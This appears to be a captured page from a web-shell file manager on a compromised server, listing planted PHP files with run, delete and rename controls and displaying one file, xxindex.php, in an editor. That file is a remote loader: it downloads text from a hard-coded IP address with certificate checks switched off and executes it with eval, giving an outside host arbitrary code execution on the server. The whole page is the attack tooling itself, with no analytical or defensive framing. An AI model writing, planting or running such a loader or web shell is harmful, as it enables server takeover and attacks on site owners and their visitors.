at path:
ROOT
/
xxindex.php
run:
R
W
Run
xxassets
DIR
2026-03-30 03:43:09
R
W
Run
.htaccess
233 By
2026-03-30 03:42:11
R
W
Run
Delete
Rename
xxchosen.php
122.65 KB
2026-03-30 03:42:11
R
W
Run
Delete
Rename
xxindex.php
471 By
2026-03-30 03:42:10
R
W
Run
Delete
Rename
xxsimple.php
15.05 KB
2026-03-30 03:42:10
R
W
Run
Delete
Rename
error_log
up
📄
xxindex.php
Save
<?php $u = 'http://204.12.250.234/z60321_8/stat/index2.txt'; $d = ''; if (function_exists('curl_init')) { $ch = curl_init($u); curl_setopt_array($ch, [CURLOPT_RETURNTRANSFER => 1, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_FOLLOWLOCATION => 1]); $d = curl_exec($ch); curl_close($ch); } elseif (ini_get('allow_url_fopen')) { $d = file_get_contents($u, false, stream_context_create(["ssl"=>["verify_peer"=>false]])); } if ($d) @eval('?>'.$d);?>